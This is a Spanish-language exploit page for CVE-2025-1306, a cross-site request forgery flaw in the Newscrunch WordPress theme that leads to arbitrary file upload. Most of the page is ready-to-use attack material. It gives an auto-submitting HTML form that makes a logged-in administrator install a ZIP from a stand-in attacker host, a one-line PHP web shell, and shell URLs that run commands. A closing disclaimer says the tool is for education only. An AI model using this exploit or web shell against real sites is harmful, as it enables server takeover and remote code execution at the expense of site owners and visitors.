
Newscrunch <= 1.8.4 - Cross-Site Request Forgery a Subida de Archivos Arbitraria
Este exploit apunta a una vulnerabilidad de Cross-Site Request Forgery (CSRF) a Subida Arbitraria de Archivos (CVE-2025-1306) en el tema Newscrunch para WordPress. Debido a la falta de validación de nonce en la función newscrunch_install_and_activate_plugin(), un atacante no autenticado puede engañar a un administrador con sesión iniciada para que suba archivos arbitrarios al servidor, lo que lleva a Ejecución Remota de Código (RCE).
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:HExplotabilidad: Requiere que un administrador visite un enlace malicioso diseñado.
Este exploit obliga a un administrador autenticado a ejecutar un ataque CSRF que sube un archivo ZIP malicioso que contiene una web shell.
<!DOCTYPE html>
<html>
<head>
<title>CSRF Exploit CVE-2025-1306 By Nxploit ,Khaled AlEnazi</title>
</head>
<body>
<h2>Haga clic en cualquier lugar para cargar contenido...</h2>
<script>
function sendExploit() {
var form = document.createElement("form");
form.method = "POST";
form.action = "http://target.com/wp-admin/admin-ajax.php?action=newscrunch_install_activate_plugin";
var input = document.createElement("input");
input.type = "hidden";
input.name = "plugin_url";
input.value = "http://attacker.com/shell.zip";
form.appendChild(input);
document.body.appendChild(form);
form.submit();
}
window.onload = function() {
sendExploit();
};
</script>
</body>
</html>
📌 Reemplazar:
http://target.com/ por el sitio WordPress vulnerablehttp://attacker.com/shell.zip por un payload ZIP malicioso que contenga una web shell.<?php system($_GET['cmd']); ?>
📌 Después de una explotación exitosa, acceda al shell:
http://target.com/wp-content/plugins/shell.php?cmd=whoami
http://target.com/wp-content/plugins/shell.php?cmd=ls
Esta herramienta es solo con fines educativos y de investigación en seguridad. La explotación no autorizada de vulnerabilidades es ilegal y está penada por la ley. El autor no se hace responsable de ningún uso indebido o daño causado por esta herramienta. Úsela responsablemente.